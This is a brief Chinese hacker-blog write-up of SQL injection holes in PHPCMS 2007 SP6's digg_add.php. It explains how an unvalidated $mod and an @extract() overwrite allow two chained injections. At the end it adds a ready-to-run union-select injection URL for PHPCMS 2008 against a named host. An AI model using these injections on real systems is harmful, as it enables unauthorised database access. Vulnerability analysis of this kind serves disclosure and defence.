来源:phpeval's BLOG
作者:phpeval
digg/digg_add.php
XML/HTML代码
$mod = $digg_mod;
if ($mod && $id)
{
$table_end = $channelid == 0?'':'_' . $channelid; $table_name = $CONFIG['tablepre'] . $mod . $table_end; //$mod没有任何验证就进去了。
$mod_id = $mod . 'id';
if ($mod == 'article')
{ ……………… }
else
{
$sql = "SELECT * FROM $table_name WHERE $mod_id=$id"; //第一次注入
} $res = $db->get_one($sql);
@extract($res); //看到TABLE_DIGG_DATA表有一个mod列。可以覆盖下面的$mod
……………………
$sql = "SELECT `digg_id` FROM " . TABLE_DIGG_DATA . " WHERE `mod`='$mod' AND `text_id`='$id' and `digg_channel`='$channelid'";
$res = $db->get_one($sql); //第二次注入
第一次的注入不太好。仅仅是因为单引号貌似进不去。构造一个不错的。然后第二次就把$mod覆盖后。放一个单引号进去。
想飞都可以了。
顺便发一个phpcms2008 的注入 http://www.phpeval.cn/ask/query.php?action=over&id=1 union(select 1,2)
懒得写什么了。就是一个很简单的注入
原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]
本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/PHPoday/PHPCMS2007-SP6-deyigezhuru.html